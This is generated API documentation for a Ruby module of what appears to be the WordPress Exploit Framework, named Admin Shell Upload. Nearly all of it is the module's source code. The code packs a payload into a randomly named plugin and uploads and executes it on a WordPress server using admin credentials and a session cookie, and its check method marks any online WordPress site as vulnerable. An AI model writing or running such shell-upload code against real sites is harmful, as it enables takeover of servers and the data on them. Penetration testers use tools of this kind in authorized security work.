class Wpxf::Exploit::AdminShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 9
def initialize
  super

  update_info(
    name: 'Admin Shell Upload',
    desc: %(
      This module will generate a plugin, pack the payload into it and
      upload it to a server running WordPress; providing valid admin
      credentials are used.
    ),
    author: [
      'rastating'
    ],
    date: 'Feb 21 2015'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 26
def check
  return :vulnerable if wordpress_and_online?
  :unknown
end
requires_authentication() click to toggle source
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 31
def requires_authentication
  true
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/shell/admin_shell_upload.rb, line 35
def run
  return false unless super

  emit_info 'Uploading payload...'
  res = upload_payload_as_plugin_and_execute(
    Utility::Text.rand_alpha(10),
    Utility::Text.rand_alpha(10),
    session_cookie
  )

  !res.nil?
end